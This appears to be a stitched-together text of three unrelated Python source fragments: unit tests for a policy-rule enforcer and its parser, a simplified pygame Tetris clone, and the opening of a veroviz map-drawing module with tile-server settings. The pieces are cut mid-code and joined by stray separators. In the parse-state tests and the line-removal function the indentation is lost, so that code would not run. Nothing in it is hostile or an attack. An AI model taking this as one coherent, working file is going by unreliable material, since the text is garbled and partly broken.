        e = self.assertRaises(cfg.ConfigFilesNotFoundError,
                              enforcer._get_policy_path)
        self.assertEqual(('raise_error.json', ), e.config_files)
    def test_enforcer_set_rules(self):
        # Explicitly-set rules survive a (non-forced) load_rules().
        self.enforcer.load_rules()
        self.enforcer.set_rules({'test': 'test1'})
        self.enforcer.load_rules()
        self.assertEqual(self.enforcer.rules, {'test': 'test1'})
class FakeCheck(policy.BaseCheck):
    """Stub check: returns a canned result, or echoes its call arguments."""

    def __init__(self, result=None):
        self.result = result

    def __str__(self):
        return str(self.result)

    def __call__(self, target, creds, enforcer):
        # With no canned result, echo the arguments so tests can verify
        # exactly what the enforcer passed in.
        if self.result is None:
            return (target, creds, enforcer)
        return self.result
class CheckFunctionTestCase(PolicyBaseTestCase):
    """Tests for Enforcer.enforce() dispatch and exception raising."""
    def test_check_explicit(self):
        # Passing a check object directly bypasses the rules dict.
        rule = FakeCheck()
        result = self.enforcer.enforce(rule, "target", "creds")
        self.assertEqual(result, ("target", "creds", self.enforcer))
    def test_check_no_rules(self):
        # With no rules and no default, enforcement denies.
        cfg.CONF.set_override('policy_file', 'empty.json')
        self.enforcer.default_rule = None
        self.enforcer.load_rules()
        result = self.enforcer.enforce('rule', "target", "creds")
        self.assertEqual(result, False)
    def test_check_with_rule(self):
        self.enforcer.set_rules(dict(default=FakeCheck()))
        result = self.enforcer.enforce("default", "target", "creds")
        self.assertEqual(result, ("target", "creds", self.enforcer))
    def test_check_raises(self):
        # The extra positional True asks enforce() to raise the supplied
        # exception class with the given args/kwargs on denial.
        self.enforcer.set_rules(dict(default=policy.FalseCheck()))
        try:
            self.enforcer.enforce('rule', 'target', 'creds',
                                  True, MyException, "arg1",
                                  "arg2", kw1="kwarg1", kw2="kwarg2")
        except MyException as exc:
            self.assertEqual(exc.args, ("arg1", "arg2"))
            self.assertEqual(exc.kwargs, dict(kw1="kwarg1", kw2="kwarg2"))
        else:
            self.fail("enforcer.enforce() failed to raise requested exception")
class FalseCheckTestCase(test.BaseTestCase):
    """Behavior of the constant-deny FalseCheck."""
    def test_str(self):
        # FalseCheck renders as the literal '!'.
        self.assertEqual('!', str(policy.FalseCheck()))
    def test_call(self):
        # Always denies regardless of arguments.
        self.assertEqual(False, policy.FalseCheck()('target', 'creds', None))
class TrueCheckTestCase(test.BaseTestCase):
    """Behavior of the constant-allow TrueCheck."""
    def test_str(self):
        # TrueCheck renders as the literal '@'.
        self.assertEqual('@', str(policy.TrueCheck()))
    def test_call(self):
        # Always allows regardless of arguments.
        self.assertEqual(True, policy.TrueCheck()('target', 'creds', None))
class CheckForTest(policy.Check):
    """Minimal concrete policy.Check used to exercise the base class."""
    def __call__(self, target, creds, enforcer):
        # No-op: only the inherited kind/match handling is under test.
        pass
class CheckTestCase(test.BaseTestCase):
    """Attribute storage and string rendering of policy.Check."""
    def test_init(self):
        chk = CheckForTest('kind', 'match')
        self.assertEqual('kind', chk.kind)
        self.assertEqual('match', chk.match)
    def test_str(self):
        # Checks render as "<kind>:<match>".
        self.assertEqual('kind:match', str(CheckForTest('kind', 'match')))
class NotCheckTestCase(test.BaseTestCase):
    """Tests that policy.NotCheck inverts its wrapped rule."""
    def test_init(self):
        check = policy.NotCheck('rule')
        self.assertEqual(check.rule, 'rule')
    def test_str(self):
        check = policy.NotCheck('rule')
        self.assertEqual(str(check), 'not rule')
    def test_call_true(self):
        # Wrapped rule returns True -> NotCheck yields False.
        rule = mock.Mock(return_value=True)
        check = policy.NotCheck(rule)
        self.assertEqual(check('target', 'cred', None), False)
        rule.assert_called_once_with('target', 'cred', None)
    def test_call_false(self):
        # Wrapped rule returns False -> NotCheck yields True.
        rule = mock.Mock(return_value=False)
        check = policy.NotCheck(rule)
        self.assertEqual(check('target', 'cred', None), True)
        rule.assert_called_once_with('target', 'cred', None)
class AndCheckTestCase(test.BaseTestCase):
    """Tests that policy.AndCheck short-circuits on the first False rule."""
    def test_init(self):
        check = policy.AndCheck(['rule1', 'rule2'])
        self.assertEqual(check.rules, ['rule1', 'rule2'])
    def test_add_check(self):
        check = policy.AndCheck(['rule1', 'rule2'])
        check.add_check('rule3')
        self.assertEqual(check.rules, ['rule1', 'rule2', 'rule3'])
    def test_str(self):
        check = policy.AndCheck(['rule1', 'rule2'])
        self.assertEqual(str(check), '(rule1 and rule2)')
    def test_call_all_false(self):
        rules = [mock.Mock(return_value=False), mock.Mock(return_value=False)]
        check = policy.AndCheck(rules)
        self.assertEqual(check('target', 'cred', None), False)
        rules[0].assert_called_once_with('target', 'cred', None)
        # Short-circuit: the second rule is never evaluated.
        self.assertFalse(rules[1].called)
    def test_call_first_true(self):
        rules = [mock.Mock(return_value=True), mock.Mock(return_value=False)]
        check = policy.AndCheck(rules)
        self.assertFalse(check('target', 'cred', None))
        # The first rule passed, so the second must be consulted too.
        rules[0].assert_called_once_with('target', 'cred', None)
        rules[1].assert_called_once_with('target', 'cred', None)
    def test_call_second_true(self):
        rules = [mock.Mock(return_value=False), mock.Mock(return_value=True)]
        check = policy.AndCheck(rules)
        self.assertFalse(check('target', 'cred', None))
        rules[0].assert_called_once_with('target', 'cred', None)
        # Evaluation stops at the first False, so rules[1] is never called.
        self.assertFalse(rules[1].called)
class OrCheckTestCase(test.BaseTestCase):
    """Tests that policy.OrCheck short-circuits on the first True rule."""
    def test_init(self):
        check = policy.OrCheck(['rule1', 'rule2'])
        self.assertEqual(check.rules, ['rule1', 'rule2'])
    def test_add_check(self):
        check = policy.OrCheck(['rule1', 'rule2'])
        check.add_check('rule3')
        self.assertEqual(check.rules, ['rule1', 'rule2', 'rule3'])
    def test_str(self):
        check = policy.OrCheck(['rule1', 'rule2'])
        self.assertEqual(str(check), '(rule1 or rule2)')
    def test_call_all_false(self):
        # No rule passes, so every rule must be evaluated.
        rules = [mock.Mock(return_value=False), mock.Mock(return_value=False)]
        check = policy.OrCheck(rules)
        self.assertEqual(check('target', 'cred', None), False)
        rules[0].assert_called_once_with('target', 'cred', None)
        rules[1].assert_called_once_with('target', 'cred', None)
    def test_call_first_true(self):
        rules = [mock.Mock(return_value=True), mock.Mock(return_value=False)]
        check = policy.OrCheck(rules)
        self.assertEqual(check('target', 'cred', None), True)
        rules[0].assert_called_once_with('target', 'cred', None)
        # Short-circuit: the second rule is never evaluated.
        self.assertFalse(rules[1].called)
    def test_call_second_true(self):
        rules = [mock.Mock(return_value=False), mock.Mock(return_value=True)]
        check = policy.OrCheck(rules)
        self.assertEqual(check('target', 'cred', None), True)
        rules[0].assert_called_once_with('target', 'cred', None)
        rules[1].assert_called_once_with('target', 'cred', None)
class ParseCheckTestCase(test.BaseTestCase):
    """Tests for policy._parse_check, the rule-string to Check parser."""

    def test_false(self):
        result = policy._parse_check('!')

        self.assertIsInstance(result, policy.FalseCheck)

    def test_true(self):
        result = policy._parse_check('@')

        self.assertIsInstance(result, policy.TrueCheck)

    def test_bad_rule(self):
        # An unparseable rule must fail closed (deny).
        result = policy._parse_check('foobar')

        self.assertIsInstance(result, policy.FalseCheck)

    @mock.patch.object(policy, '_checks', {})
    def test_no_handler(self):
        # With no registered handlers the check must fail closed.
        result = policy._parse_check('no:handler')

        self.assertIsInstance(result, policy.FalseCheck)

    @mock.patch.object(policy, '_checks', {
        'spam': mock.Mock(return_value="spam_check"),
        None: mock.Mock(return_value="none_check"),
    })
    def test_check(self):
        result = policy._parse_check('spam:handler')

        # The specific 'spam' handler wins over the None (default) handler.
        self.assertEqual(result, 'spam_check')
        policy._checks['spam'].assert_called_once_with('spam', 'handler')
        policy._checks[None].assert_not_called()

    @mock.patch.object(policy, '_checks', {
        None: mock.Mock(return_value="none_check"),
    })
    def test_check_default(self):
        result = policy._parse_check('spam:handler')

        # Unknown kinds fall through to the None (default) handler.
        self.assertEqual(result, 'none_check')
        policy._checks[None].assert_called_once_with('spam', 'handler')
class ParseListRuleTestCase(test.BaseTestCase):
    """Tests for policy._parse_list_rule (legacy list-of-lists policy syntax).

    Inner lists are ANDed together; the outer list ORs the inner results.
    """

    def test_empty(self):
        # An empty policy list means "always allow".
        result = policy._parse_list_rule([])

        self.assertIsInstance(result, policy.TrueCheck)
        self.assertEqual(str(result), '@')

    @mock.patch.object(policy, '_parse_check', FakeCheck)
    def test_oneele_zeroele(self):
        # A single empty inner list means "never allow".
        result = policy._parse_list_rule([[]])

        self.assertIsInstance(result, policy.FalseCheck)
        self.assertEqual(str(result), '!')

    @mock.patch.object(policy, '_parse_check', FakeCheck)
    def test_oneele_bare(self):
        result = policy._parse_list_rule(['rule'])

        self.assertIsInstance(result, FakeCheck)
        self.assertEqual(result.result, 'rule')
        self.assertEqual(str(result), 'rule')

    @mock.patch.object(policy, '_parse_check', FakeCheck)
    def test_oneele_oneele(self):
        result = policy._parse_list_rule([['rule']])

        self.assertIsInstance(result, FakeCheck)
        self.assertEqual(result.result, 'rule')
        self.assertEqual(str(result), 'rule')

    @mock.patch.object(policy, '_parse_check', FakeCheck)
    def test_oneele_multi(self):
        # Multiple rules inside one inner list are ANDed together.
        result = policy._parse_list_rule([['rule1', 'rule2']])

        self.assertIsInstance(result, policy.AndCheck)
        self.assertEqual(len(result.rules), 2)
        for i, value in enumerate(['rule1', 'rule2']):
            self.assertIsInstance(result.rules[i], FakeCheck)
            self.assertEqual(result.rules[i].result, value)
        self.assertEqual(str(result), '(rule1 and rule2)')

    @mock.patch.object(policy, '_parse_check', FakeCheck)
    def test_multi_oneele(self):
        # Separate inner lists are ORed together.
        result = policy._parse_list_rule([['rule1'], ['rule2']])

        self.assertIsInstance(result, policy.OrCheck)
        self.assertEqual(len(result.rules), 2)
        for i, value in enumerate(['rule1', 'rule2']):
            self.assertIsInstance(result.rules[i], FakeCheck)
            self.assertEqual(result.rules[i].result, value)
        self.assertEqual(str(result), '(rule1 or rule2)')

    @mock.patch.object(policy, '_parse_check', FakeCheck)
    def test_multi_multi(self):
        result = policy._parse_list_rule([['rule1', 'rule2'],
                                          ['rule3', 'rule4']])

        self.assertIsInstance(result, policy.OrCheck)
        self.assertEqual(len(result.rules), 2)
        for i, values in enumerate([['rule1', 'rule2'], ['rule3', 'rule4']]):
            self.assertIsInstance(result.rules[i], policy.AndCheck)
            self.assertEqual(len(result.rules[i].rules), 2)
            for j, value in enumerate(values):
                self.assertIsInstance(result.rules[i].rules[j], FakeCheck)
                self.assertEqual(result.rules[i].rules[j].result, value)
        self.assertEqual(str(result),
                         '((rule1 and rule2) or (rule3 and rule4))')
class ParseTokenizeTestCase(test.BaseTestCase):
    """Tests for policy._parse_tokenize, the policy-language lexer."""

    # Identity-patch _parse_check so 'check' tokens carry the raw text through.
    @mock.patch.object(policy, '_parse_check', lambda x: x)
    def test_tokenize(self):
        # Exercises nested parens, keywords (case-insensitive 'And'), a
        # check expression containing a %-substitution, and both quote styles.
        exemplar = ("(( ( ((() And)) or ) (check:%(miss)s) not)) "
                    "'a-string' \"another-string\"")
        # Each token is a (kind, raw_text) pair.
        expected = [
            ('(', '('), ('(', '('), ('(', '('), ('(', '('), ('(', '('),
            ('(', '('), (')', ')'), ('and', 'And'),
            (')', ')'), (')', ')'), ('or', 'or'), (')', ')'), ('(', '('),
            ('check', 'check:%(miss)s'), (')', ')'), ('not', 'not'),
            (')', ')'), (')', ')'),
            ('string', 'a-string'),
            ('string', 'another-string'),
        ]

        result = list(policy._parse_tokenize(exemplar))

        self.assertEqual(result, expected)
class ParseStateMetaTestCase(test.BaseTestCase):
    """Tests for the @policy.reducer decorator and the ParseStateMeta metaclass."""

    def test_reducer(self):
        # Stacked decorators accumulate on one 'reducers' attribute; the
        # innermost decorator is applied first, so it lands first in the list.
        @policy.reducer('a', 'b', 'c')
        @policy.reducer('d', 'e', 'f')
        def spam():
            pass

        self.assertTrue(hasattr(spam, 'reducers'))
        self.assertEqual(spam.reducers, [['d', 'e', 'f'], ['a', 'b', 'c']])

    def test_parse_state_meta(self):
        # The metaclass collects every decorated method's reductions into a
        # class-level (reduction, method_name) table.
        @six.add_metaclass(policy.ParseStateMeta)
        class FakeState(object):

            @policy.reducer('a', 'b', 'c')
            @policy.reducer('d', 'e', 'f')
            def reduce1(self):
                pass

            @policy.reducer('g', 'h', 'i')
            def reduce2(self):
                pass

        self.assertTrue(hasattr(FakeState, 'reducers'))
        for reduction, reducer in FakeState.reducers:
            if (reduction == ['a', 'b', 'c'] or
                    reduction == ['d', 'e', 'f']):
                self.assertEqual(reducer, 'reduce1')
            elif reduction == ['g', 'h', 'i']:
                self.assertEqual(reducer, 'reduce2')
            else:
                self.fail("Unrecognized reducer discovered")
class ParseStateTestCase(test.BaseTestCase):
def test_init(self):
state = policy.ParseState()
self.assertEqual(state.tokens, [])
self.assertEqual(state.values, [])
@mock.patch.object(policy.ParseState, 'reducers', [(['tok1'], 'meth')])
@mock.patch.object(policy.ParseState, 'meth', create=True)
def test_reduce_none(self, mock_meth):
state = policy.ParseState()
state.tokens = ['tok2']
state.values = ['val2']
state.reduce()
self.assertEqual(state.tokens, ['tok2'])
self.assertEqual(state.values, ['val2'])
self.assertFalse(mock_meth.called)
@mock.patch.object(policy.ParseState, 'reducers',
[(['tok1', 'tok2'], 'meth')])
@mock.patch.object(policy.ParseState, 'meth', create=True)
def test_reduce_short(self, mock_meth):
state = policy.ParseState()
state.tokens = ['tok1']
state.values = ['val1']
state.reduce()
self.assertEqual(state.tokens, ['tok1'])
self.assertEqual(state.values, ['val1'])
self.assertFalse(mock_meth.called)
@mock.patch.object(policy.ParseState, 'reducers',
[(['tok1', 'tok2'], 'meth')])
@mock.patch.object(policy.ParseState, 'meth', create=True,
return_value=[('tok3', 'val3')])
def test_reduce_one(self, mock_meth):
state = policy.ParseState()
state.tokens = ['tok1', 'tok2']
state.values = ['val1', 'val2']
state.reduce()
self.assertEqual(state.tokens, ['tok3'])
self.assertEqual(state.values, | |
# Tetromino for Idiots, by <NAME> <EMAIL>
# (Pygame) Tetris, but... simpler.
import random, time, pygame, sys
from pygame.locals import *
FPS = 25              # frames per second the display updates at
WINDOWWIDTH = 640     # window size, in pixels
WINDOWHEIGHT = 480
BOXSIZE = 20          # pixel width/height of one board cell
BOARDWIDTH = 10       # board dimensions, in cells
BOARDHEIGHT = 20
BLANK = '.'           # marker for an empty board cell

# Key-repeat intervals (seconds) while a movement key is held down.
MOVESIDEWAYSFREQ = 0.15
MOVEDOWNFREQ = 0.1

# Pixel margins that position the board inside the window.
XMARGIN = int((WINDOWWIDTH - BOARDWIDTH * BOXSIZE) / 2)
TOPMARGIN = WINDOWHEIGHT - (BOARDHEIGHT * BOXSIZE) - 5

#               R    G    B
WHITE       = (255, 255, 255)
GRAY        = (185, 185, 185)
BLACK       = (  0,   0,   0)
RED         = (155,   0,   0)
LIGHTRED    = (175,  20,  20)
GREEN       = (  0, 155,   0)
LIGHTGREEN  = ( 20, 175,  20)
BLUE        = (  0,   0, 155)
LIGHTBLUE   = ( 20,  20, 175)
YELLOW      = (155, 155,   0)
LIGHTYELLOW = (175, 175,  20)

BORDERCOLOR = BLUE
BGCOLOR = BLACK
TEXTCOLOR = WHITE
TEXTSHADOWCOLOR = GRAY
# Pieces index into these tuples by 'color'; the light variant is the highlight.
COLORS      = (     BLUE,      GREEN,      RED,      YELLOW)
LIGHTCOLORS = (LIGHTBLUE, LIGHTGREEN, LIGHTRED, LIGHTYELLOW)
assert len(COLORS) == len(LIGHTCOLORS) # each color must have light color

# Every piece template is a TEMPLATEWIDTH x TEMPLATEHEIGHT grid of strings;
# 'O' marks an occupied cell. This "for Idiots" variant ships exactly one
# shape: a single centered cell.
TEMPLATEWIDTH = 5
TEMPLATEHEIGHT = 5

SHAPE_TEMPLATE = [['.....',
                   '.....',
                   '..O..',
                   '.....',
                   '.....']]

PIECES = {'A': SHAPE_TEMPLATE}
def main():
    """Initialize pygame and the global UI objects, then loop forever:
    pick music, run one game, show the game-over screen."""
    global FPSCLOCK, DISPLAYSURF, BASICFONT, BIGFONT
    pygame.init()
    FPSCLOCK = pygame.time.Clock()
    DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))
    BASICFONT = pygame.font.Font('freesansbold.ttf', 18)
    BIGFONT = pygame.font.Font('freesansbold.ttf', 60)
    pygame.display.set_caption('Tetromino for Idiots')

    showTextScreen('Tetromino for Idiots')
    while True: # game loop
        # Pick one of the two background tracks at random for each game.
        if random.randint(0, 1) == 0:
            pygame.mixer.music.load('tetrisb.mid')
        else:
            pygame.mixer.music.load('tetrisc.mid')
        pygame.mixer.music.play(-1, 0.0)
        runGame()
        pygame.mixer.music.stop()
        showTextScreen('Game Over')
def runGame():
    """Run a single game until the board fills up, then return.

    One pass of the outer loop = one rendered frame: spawn a piece if
    needed, handle input events, apply held-key auto-repeat, apply
    gravity, then draw. Returns (game over) when a freshly spawned piece
    does not fit on the board.
    """
    # setup variables for the start of the game
    board = getBlankBoard()
    lastMoveDownTime = time.time()
    lastMoveSidewaysTime = time.time()
    lastFallTime = time.time()
    movingDown = False # note: there is no movingUp variable
    movingLeft = False
    movingRight = False
    score = 0
    level, fallFreq = calculateLevelAndFallFreq(score)

    fallingPiece = getNewPiece()
    nextPiece = getNewPiece()

    while True: # game loop
        if fallingPiece == None:
            # No falling piece in play, so start a new piece at the top
            fallingPiece = nextPiece
            nextPiece = getNewPiece()
            lastFallTime = time.time() # reset lastFallTime

            if not isValidPosition(board, fallingPiece):
                return # can't fit a new piece on the board, so game over

        checkForQuit()
        for event in pygame.event.get(): # event handling loop
            if event.type == KEYUP:
                if (event.key == K_p):
                    # Pausing the game
                    DISPLAYSURF.fill(BGCOLOR)
                    pygame.mixer.music.stop()
                    showTextScreen('Paused') # pause until a key press
                    pygame.mixer.music.play(-1, 0.0)
                    # Reset all timers so the pause doesn't count as elapsed time.
                    lastFallTime = time.time()
                    lastMoveDownTime = time.time()
                    lastMoveSidewaysTime = time.time()
                elif (event.key == K_LEFT or event.key == K_a):
                    movingLeft = False
                elif (event.key == K_RIGHT or event.key == K_d):
                    movingRight = False
                elif (event.key == K_DOWN or event.key == K_s):
                    movingDown = False

            elif event.type == KEYDOWN:
                # moving the piece sideways
                if (event.key == K_LEFT or event.key == K_a) and isValidPosition(board, fallingPiece, adjX=-1):
                    fallingPiece['x'] -= 1
                    movingLeft = True
                    movingRight = False
                    lastMoveSidewaysTime = time.time()

                elif (event.key == K_RIGHT or event.key == K_d) and isValidPosition(board, fallingPiece, adjX=1):
                    fallingPiece['x'] += 1
                    movingRight = True
                    movingLeft = False
                    lastMoveSidewaysTime = time.time()

                # rotating the piece (if there is room to rotate)
                elif (event.key == K_UP or event.key == K_w):
                    fallingPiece['rotation'] = (fallingPiece['rotation'] + 1) % len(PIECES[fallingPiece['shape']])
                    if not isValidPosition(board, fallingPiece):
                        # Rotation blocked: undo it.
                        fallingPiece['rotation'] = (fallingPiece['rotation'] - 1) % len(PIECES[fallingPiece['shape']])
                elif (event.key == K_q): # rotate the other direction
                    fallingPiece['rotation'] = (fallingPiece['rotation'] - 1) % len(PIECES[fallingPiece['shape']])
                    if not isValidPosition(board, fallingPiece):
                        fallingPiece['rotation'] = (fallingPiece['rotation'] + 1) % len(PIECES[fallingPiece['shape']])

                # making the piece fall faster with the down key
                elif (event.key == K_DOWN or event.key == K_s):
                    movingDown = True
                    if isValidPosition(board, fallingPiece, adjY=1):
                        fallingPiece['y'] += 1
                    lastMoveDownTime = time.time()

                # move the current piece all the way down
                elif event.key == K_SPACE:
                    movingDown = False
                    movingLeft = False
                    movingRight = False
                    # Find the largest drop that is still valid; i ends one
                    # past the last valid offset, hence the i - 1 below.
                    for i in range(1, BOARDHEIGHT):
                        if not isValidPosition(board, fallingPiece, adjY=i):
                            break
                    fallingPiece['y'] += i - 1

        # handle moving the piece because of user input
        if (movingLeft or movingRight) and time.time() - lastMoveSidewaysTime > MOVESIDEWAYSFREQ:
            if movingLeft and isValidPosition(board, fallingPiece, adjX=-1):
                fallingPiece['x'] -= 1
            elif movingRight and isValidPosition(board, fallingPiece, adjX=1):
                fallingPiece['x'] += 1
            lastMoveSidewaysTime = time.time()

        if movingDown and time.time() - lastMoveDownTime > MOVEDOWNFREQ and isValidPosition(board, fallingPiece, adjY=1):
            fallingPiece['y'] += 1
            lastMoveDownTime = time.time()

        # let the piece fall if it is time to fall
        if time.time() - lastFallTime > fallFreq:
            # see if the piece has landed
            if not isValidPosition(board, fallingPiece, adjY=1):
                # falling piece has landed, set it on the board
                addToBoard(board, fallingPiece)
                score += removeCompleteLines(board)
                level, fallFreq = calculateLevelAndFallFreq(score)
                fallingPiece = None
            else:
                # piece did not land, just move the piece down
                fallingPiece['y'] += 1
                lastFallTime = time.time()

        # drawing everything on the screen
        DISPLAYSURF.fill(BGCOLOR)
        drawBoard(board)
        drawStatus(score, level)
        drawNextPiece(nextPiece)
        if fallingPiece != None:
            drawPiece(fallingPiece)

        pygame.display.update()
        FPSCLOCK.tick(FPS)
def makeTextObjs(text, font, color):
    """Render *text* with *font* in *color*; return (surface, rect)."""
    rendered = font.render(text, True, color)
    return rendered, rendered.get_rect()
def terminate():
    """Shut down pygame cleanly, then exit the process."""
    pygame.quit()
    sys.exit()
def checkForKeyPress():
    """Return the key of the first queued KEYUP event, or None.

    Any KEYDOWN events fetched alongside are discarded so they don't
    pile up in the queue. QUIT/Escape are handled via checkForQuit().
    """
    checkForQuit()
    for event in pygame.event.get([KEYDOWN, KEYUP]):
        if event.type == KEYUP:
            return event.key
    return None
def showTextScreen(text):
    """Display *text* large and centered until any key is pressed.

    Blocks inside its own mini event loop (via checkForKeyPress), so the
    caller's timers should be reset after this returns.
    """
    # Draw the text drop shadow
    titleSurf, titleRect = makeTextObjs(text, BIGFONT, TEXTSHADOWCOLOR)
    titleRect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2))
    DISPLAYSURF.blit(titleSurf, titleRect)

    # Draw the text (offset 2px up-left from the shadow)
    titleSurf, titleRect = makeTextObjs(text, BIGFONT, TEXTCOLOR)
    titleRect.center = (int(WINDOWWIDTH / 2) - 2, int(WINDOWHEIGHT / 2) - 2)
    DISPLAYSURF.blit(titleSurf, titleRect)

    # Draw the additional "Press a key to play." text.
    pressKeySurf, pressKeyRect = makeTextObjs('Press a key to play.', BASICFONT, TEXTCOLOR)
    pressKeyRect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2) + 100)
    DISPLAYSURF.blit(pressKeySurf, pressKeyRect)

    while checkForKeyPress() == None:
        pygame.display.update()
        FPSCLOCK.tick()
def checkForQuit():
    """Terminate on any QUIT event or an Escape KEYUP.

    Non-Escape KEYUP events are re-posted so callers that read the event
    queue afterwards still see them.
    """
    for event in pygame.event.get(QUIT): # get all the QUIT events
        terminate() # terminate if any QUIT events are present
    for event in pygame.event.get(KEYUP): # get all the KEYUP events
        if event.key == K_ESCAPE:
            terminate() # terminate if the KEYUP event was for the Esc key
        pygame.event.post(event) # put the other KEYUP event objects back
def calculateLevelAndFallFreq(score):
    """Map *score* to a (level, fallFreq) pair.

    The level rises every 10 points; each level shortens the interval
    between automatic one-cell drops by 0.02 s from a 0.27 s baseline.
    """
    level = int(score / 10) + 1
    return level, 0.27 - level * 0.02
def getNewPiece():
    """Return a dict describing a random piece, spawned just above the board."""
    shape = random.choice(list(PIECES.keys()))
    return {
        'shape': shape,
        'rotation': random.randint(0, len(PIECES[shape]) - 1),
        'x': int(BOARDWIDTH / 2) - int(TEMPLATEWIDTH / 2),
        'y': -2,  # start it above the board (i.e. less than 0)
        'color': random.randint(0, len(COLORS) - 1),
    }
def addToBoard(board, piece):
    """Stamp *piece*'s occupied template cells onto *board* at its position."""
    template = PIECES[piece['shape']][piece['rotation']]
    for col in range(TEMPLATEWIDTH):
        for row in range(TEMPLATEHEIGHT):
            if template[row][col] != BLANK:
                board[col + piece['x']][row + piece['y']] = piece['color']
def getBlankBoard():
    """Return a fresh BOARDWIDTH x BOARDHEIGHT board of BLANK cells
    (indexed board[x][y], column-major)."""
    return [[BLANK] * BOARDHEIGHT for _ in range(BOARDWIDTH)]
def isOnBoard(x, y):
    """True if (x, y) lies on the board. Note: no lower bound on y —
    cells above the board are screened out by the caller instead."""
    return 0 <= x < BOARDWIDTH and y < BOARDHEIGHT
def isValidPosition(board, piece, adjX=0, adjY=0):
    """Return True if *piece*, offset by (adjX, adjY), is on the board
    and not colliding with any placed cell."""
    template = PIECES[piece['shape']][piece['rotation']]
    for col in range(TEMPLATEWIDTH):
        for row in range(TEMPLATEHEIGHT):
            # Cells above the top of the board, and empty template cells,
            # never collide.
            if row + piece['y'] + adjY < 0 or template[row][col] == BLANK:
                continue
            boardX = col + piece['x'] + adjX
            boardY = row + piece['y'] + adjY
            if not isOnBoard(boardX, boardY):
                return False
            if board[boardX][boardY] != BLANK:
                return False
    return True
def isCompleteLine(board, y):
    """Return True if row *y* is completely filled (no BLANK cells)."""
    return all(board[x][y] != BLANK for x in range(BOARDWIDTH))
def removeCompleteLines(board):
# Remove any completed lines on the board, move everything above them down, and return the number of complete lines.
numLinesRemoved = 0
y = BOARDHEIGHT - 1 # start y at the bottom of the board
while y >= 0:
if isCompleteLine(board, y):
# Remove the line and pull boxes down by one line.
for pullDownY in range(y, 0, -1):
for x in range(BOARDWIDTH):
board[x][pullDownY] = board[x][pullDownY-1]
# Set very top line to blank.
for x in range(BOARDWIDTH):
board[x][0] = BLANK
numLinesRemoved += 1
# Note on the next iteration of the loop, y is the same.
# This is so that if the line that | |
<gh_stars>0
from veroviz._common import *
from veroviz._validation import valCreateLeaflet
from veroviz._validation import valAddLeafletCircle
from veroviz._validation import valAddLeafletMarker
from veroviz._validation import valAddLeafletPolygon
from veroviz._validation import valAddLeafletPolyline
from veroviz._validation import valAddLeafletText
from veroviz._internal import replaceBackslashToSlash
from veroviz._deconstructAssignments import deconstructAssignments
from veroviz.utilities import getMapBoundary
from veroviz._geometry import geoDistancePath2D
from veroviz._geometry import geoMileageInPath2D
from veroviz._geometry import geoDistance2D
# Tile-set names that folium understands natively; these are passed straight
# through as folium's `tiles` argument (compare customMaps below, which need
# explicit tile URLs and attributions).
foliumMaps = [
    'cartodb positron',
    'cartodb dark_matter',
    'openstreetmap',
    'stamen terrain',
    'stamen toner',
    'stamen watercolor'
]
customMaps = {
'arcgis aerial': {
'tiles': 'https://server.arcgisonline.com/ArcGIS/rest/services/World_Imagery/MapServer/tile/{z}/{y}/{x}',
'attr': 'Tiles © Esri — Source: Esri, i-cubed, USDA, USGS, AEX, GeoEye, Getmapping, Aerogrid, IGN, IGP, UPR-EGP, and the GIS User Community'
},
'arcgis gray': {
'tiles': 'https://server.arcgisonline.com/ArcGIS/rest/services/Canvas/World_Light_Gray_Base/MapServer/tile/{z}/{y}/{x}',
'attr': 'Tiles © Esri — Esri, DeLorme, NAVTEQ'
},
'arcgis ocean': {
'tiles': 'https://server.arcgisonline.com/ArcGIS/rest/services/Ocean_Basemap/MapServer/tile/{z}/{y}/{x}',
'attr': 'Tiles © Esri — Sources: GEBCO, NOAA, CHS, OSU, UNH, CSUMB, National Geographic, DeLorme, NAVTEQ, and Esri'
},
'arcgis roadmap': {
'tiles': 'https://server.arcgisonline.com/ArcGIS/rest/services/World_Street_Map/MapServer/tile/{z}/{y}/{x}',
'attr': 'Tiles © Esri — Source: Esri'
},
'arcgis shaded relief': {
'tiles': 'https://server.arcgisonline.com/ArcGIS/rest/services/World_Shaded_Relief/MapServer/tile/{z}/{y}/{x}',
'attr': 'Tiles © Esri — Source: Esri'
},
'arcgis topo': {
'tiles': 'https://server.arcgisonline.com/ArcGIS/rest/services/World_Topo_Map/MapServer/tile/{z}/{y}/{x}',
'attr': 'Tiles © Esri — Source: Esri'
},
'open topo': {
'tiles': 'https://{s}.tile.opentopomap.org/{z}/{x}/{y}.png',
'attr': 'Map data: © <a href="https://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors, <a href="http://viewfinderpanoramas.org">SRTM</a> | Map style: © <a href="https://opentopomap.org">OpenTopoMap</a> (<a href="https://creativecommons.org/licenses/by-sa/3.0/">CC-BY-SA</a>)'
},
}
def createLeaflet(mapObject=None, mapFilename=None, mapBackground=VRV_DEFAULT_LEAFLET_MAPTILES, mapBoundary=None, zoomStart=None, nodes=None, iconPrefix=None, iconType=None, iconColor=None, iconText=None, arcs=None, arcWeight=None, arcStyle=None, arcOpacity=None, arcColor=None, useArrows=None, boundingRegion=None, boundingWeight=VRV_DEFAULT_LEAFLETBOUNDINGWEIGHT, boundingOpacity=VRV_DEFAULT_LEAFLETBOUNDINGOPACITY, boundingStyle=VRV_DEFAULT_LEAFLETBOUNDINGSTYLE, boundingColor=VRV_DEFAULT_LEAFLETBOUNDINGCOLOR):
"""
createLeaflet is used to generate Leaflet objects using folium. The function takes a boundingRegion polygon, `Nodes`, `Arcs`, and `Assignments` dataframes as inputs, and creates a folium/leaflet map showing boundings, nodes and/or arcs.
Parameters
----------
mapObject: Folium object, Optional, default as None
If you already have a map (as a Folium object), you can provide that object and add content to that map.
mapFilename: string, Optional, default as None
This is the name of the map file that will be created (e.g., "../output/map.html" or "map.html"). The filename should have a `.html` extension. If `mapFilename` is not provided, no map file will be generated. The returned map object can be viewed within a Jupyter notebook.
mapBackground: string, Optional, default as 'CartoDB positron'
Sets the background tiles of the map. See :ref:`Leaflet Style` for the list of options.
mapBoundary: list of lists, Optional, default as None
Allows customization of the zoom level. If a map boundary is provided, the zoom level will correspond to the rectangle defined by the two map boundary points. This feature is useful if you want to create multiple comparison maps, each with the same zoom level and centering. Must be in the form [[south lat, west lon], [north lat, east lon]].
zoomStart: int, Optional, default as None
